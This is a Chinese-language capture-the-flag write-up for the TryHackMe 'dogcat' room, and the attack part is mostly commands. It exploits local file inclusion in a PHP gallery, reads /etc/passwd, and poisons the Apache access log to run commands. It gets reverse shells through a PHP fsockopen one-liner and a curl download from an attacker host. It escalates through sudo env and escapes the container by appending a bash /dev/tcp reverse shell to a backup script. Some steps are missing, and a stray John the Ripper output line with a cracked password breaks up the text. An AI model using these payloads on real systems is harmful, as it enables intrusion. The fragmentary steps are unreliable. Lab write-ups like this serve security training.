【THM】dogcat-Practice

本文相关的TryHackMe实验房间链接：https://tryhackme.com/room/dogcat

Difficulty: Medium

┌──(root㉿kali)-[~]
└─# nmap -p- -sC -sV -T4 10.10.93.198 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-09 20:22 EST
Nmap scan report for 10.10.93.198
Host is up (0.32s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 24:31:19:2a:b1:97:1a:04:4e:2c:36:ac:84:0a:75:87 (RSA)
|   256 21:3d:46:18:93:aa:f9:e7:c9:b5:4c:0f:16:0b:71:e1 (ECDSA)
|_  256 c1:fb:7d:73:2b:57:4a:8b:dc:d7:6f:49:bb:3b:d0:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: dogcat
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

我们访问80端口

http://10.10.93.198/?view=cat

这个想到了本地文件包含Local File Inclusion

访问http://10.10.93.198/cat.php

可以猜到

include $_GET['view'] . "php";

所以我们尝试访问

http://10.10.93.198/?view=../../../../etc/passwd

http://10.10.93.198/?view=dog../../../../etc/passwd

这里有一个index.php

http://10.10.93.198/?view=dog../../index

似乎存在冲突。通常，当尝试两次声明相同的函数时，通常会出现此错误，在这种情况下，这可能是由于include()函数引起的。因此，为了检索 index.php，我强制 PHP 在 include()函数中使用文件之前对文件进行 base64 编码

http://10.10.93.198/?view=php://filter/convert.base64-encode/resource=dog/../index

go!PCFET0NUWVBFIEhUTUw+CjxodG1sPgoKPGhlYWQ+CiAgICA8dGl0bGU+ZG9nY2F0PC90aXRsZT4KICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgdHlwZT0idGV4dC9jc3MiIGhyZWY9Ii9zdHlsZS5jc3MiPgo8L2hlYWQ+Cgo8Ym9keT4KICAgIDxoMT5kb2djYXQ8L2gxPgogICAgPGk+YSBnYWxsZXJ5IG9mIHZhcmlvdXMgZG9ncyBvciBjYXRzPC9pPgoKICAgIDxkaXY+CiAgICAgICAgPGgyPldoYXQgd291bGQgeW91IGxpa2UgdG8gc2VlPzwvaDI+CiAgICAgICAgPGEgaHJlZj0iLz92aWV3PWRvZyI+PGJ1dHRvbiBpZD0iZG9nIj5BIGRvZzwvYnV0dG9uPjwvYT4gPGEgaHJlZj0iLz92aWV3PWNhdCI+PGJ1dHRvbiBpZD0iY2F0Ij5BIGNhdDwvYnV0dG9uPjwvYT48YnI+CiAgICAgICAgPD9waHAKICAgICAgICAgICAgZnVuY3Rpb24gY29udGFpbnNTdHIoJHN0ciwgJHN1YnN0cikgewogICAgICAgICAgICAgICAgcmV0dXJuIHN0cnBvcygkc3RyLCAkc3Vic3RyKSAhPT0gZmFsc2U7CiAgICAgICAgICAgIH0KCSAgICAkZXh0ID0gaXNzZXQoJF9HRVRbImV4dCJdKSA/ICRfR0VUWyJleHQiXSA6ICcucGhwJzsKICAgICAgICAgICAgaWYoaXNzZXQoJF9HRVRbJ3ZpZXcnXSkpIHsKICAgICAgICAgICAgICAgIGlmKGNvbnRhaW5zU3RyKCRfR0VUWyd2aWV3J10sICdkb2cnKSB8fCBjb250YWluc1N0cigkX0dFVFsndmlldyddLCAnY2F0JykpIHsKICAgICAgICAgICAgICAgICAgICBlY2hvICdIZXJlIHlvdSBnbyEnOwogICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgJF9HRVRbJ3ZpZXcnXSAuICRleHQ7CiAgICAgICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgIGVjaG8gJ1NvcnJ5LCBvbmx5IGRvZ3Mgb3IgY2F0cyBhcmUgYWxsb3dlZC4nOwogICAgICAgICAgICAgICAgfQogICAgICAgICAgICB9CiAgICAgICAgPz4KICAgIDwvZGl2Pgo8L2JvZHk+Cgo8L2h0bWw+Cg== 

<!DOCTYPE HTML>
<html>

<head>
    <title>dogcat</title>
    <link rel="stylesheet" type="text/css" href="/style.css">
</head>

<body>
    <h1>dogcat</h1>
    <i>a gallery of various dogs or cats</i>

    <div>
        <h2>What would you like to see?</h2>
        <a href="/?view=dog"><button id="dog">A dog</button></a> <a href="/?view=cat"><button id="cat">A cat</button></a><br>
        <?php
            function containsStr($str, $substr) {
                return strpos($str, $substr) !== false;
            }
	    $ext = isset($_GET["ext"]) ? $_GET["ext"] : '.php';
            if(isset($_GET['view'])) {
                if(containsStr($_GET['view'], 'dog') || containsStr($_GET['view'], 'cat')) {
                    echo 'Here you go!';
                    include $_GET['view'] . $ext;
                } else {
                    echo 'Sorry, only dogs or cats are allowed.';
                }
            }
        ?>
    </div>
</body>

</html>

因此，这里有几件有趣的事情需要注意。首先，有一个$ext变量，它不断将.php扩展附加到我们的输入中，以解释之前的错误。此外，只要我们对视图的输入包含字符串dog/cat，我们就可以开始了。因此，现在我们对源代码有了更多的了解，让我们尝试一些路径遍历

http://10.10.93.198/?view=dog/../../../../../etc/passwd&ext=

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

下一步是访问日志

http://10.10.93.198/?view=dog/../../../../../var/log/apache2/access.log&ext=

这是日志的片段

{YOUR_IP} - - [10/Jul/2020:10:27:35 +0000] "GET /cats/4.jpg HTTP/1.1" 200 17994 "http://$IP/?view=cat" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"

{ACCESSING_IP} - - [TIME] “{REQUEST}” {RESPONSE_CODE} {I_DUNNO} “{URL}” “{USER_AGENT}”

可以用python

或者burp

http://10.10.93.198/?view=dog/../../../../../var/log/apache2/access.log&ext=&cmd=whoami

flag1

http://10.10.93.198/?view=dog/../../../../../var/log/apache2/access.log&ext=&cmd=&cmd=ls%20-l

flag2

flag3

xxxxxxxxxx ┌──(root㉿kali)-[~/Desktop]└─# john pass –show                                     vianka:beautiful1:18507:0:99999:7:::1 password hash cracked, 0 leftscss

php -r '$sock=fsockopen("10.13.38.193",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

首先开个服务

10.10.93.198/?view=dog/../../../../../var/log/apache2/access.log&ext=&cmd=curl -o php-reverse-shell.php 10.13.38.193:8000/php-reverse-shell.php

成功上传到服务器

然后使用netcat

访问

http://10.10.93.198/php-reverse-shell.php

反弹成功

gtfobins

sudo env /bin/sh

flag4

在 /opt/backups 中有两个文件，即 backup.sh 和 backup.tar ，backup.sh 的文件似乎每分钟运行一次，并且正在将数据备份到备份中.tar

在这里，我们可以看到我们实际上在一个容器内。不过，容器转义似乎并不难，因为这看起来像是主机和容器之间的共享文件夹，主机在其中运行此脚本以获取备份。我们可以简单地在文件末尾附加一个 bash 反向 shell，然后升级到主机。

echo "bash -i >& /dev/tcp/10.13.38.193/1235 0>&1" >> backup.sh